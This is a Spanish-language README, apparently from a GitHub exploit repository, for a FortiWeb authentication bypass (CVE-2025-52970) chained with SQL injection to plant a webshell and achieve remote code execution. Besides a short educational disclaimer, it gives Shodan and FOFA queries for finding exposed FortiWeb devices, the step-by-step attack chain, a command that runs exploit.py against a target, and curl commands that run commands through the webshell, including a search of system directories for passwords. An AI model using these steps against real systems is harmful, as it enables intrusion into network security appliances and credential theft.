
Demuestra un bypass de autenticación en FortiWeb (CVE-2025-52970) encadenado con inyección SQL para subir un webshell y lograr ejecución remota de código a través de cabeceras HTTP.
Este repositorio demuestra un bypass de autenticación en FortiWeb que puede encadenarse para lograr Ejecución Remota de Código (RCE).
El exploit aprovecha un endpoint vulnerable para inyectar payloads SQL, subir una webshell y ejecutar comandos a través de cabeceras HTTP.
⚠️ Descargo de responsabilidad:
Este proyecto es solo con fines educativos y de investigación.
NO lo utilices contra sistemas que no poseas o para los que no tengas permiso explícito de prueba.
((FortiWeb)) AND port:("8443")
### FOFA
title="FortiWeb" && port="8443"
### Shodan
ssl:"FortiWeb" port:8443
http.title:"FortiWeb" port:8443
CVE: CVE-2025-52970
Componente: FortiWeb Fabric API (/api/fabric/device/status)
Impacto: Bypass de autenticación → Inyección SQL → Subida de webshell → RCE
Vector: Cabecera Authorization manipulada + inyección SQL
Eliminar y crear una tabla SQL temporal.
Escribir el payload de la webshell en fragmentos.
Exportar la shell a /cgi-bin/x.cgi.
Subir el script Python auxiliar para activar los permisos.
Acceder a la webshell enviando comandos a través de la cabecera User-Agent.
git clone https://github.com/your-username/Fortinet-AuthBypass-Exploit.git
cd Fortinet-AuthBypass-Exploit
python3 exploit.py -t https://TARGET:8443/
3️⃣ Interactuar con la Webshell
curl -ks -H 'User-Agent: id' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: whoami' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: uname -a' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: grep -ril pass /etc /conf /data 2>/dev/null' https://TARGET:8443/cgi-bin/x.cgi
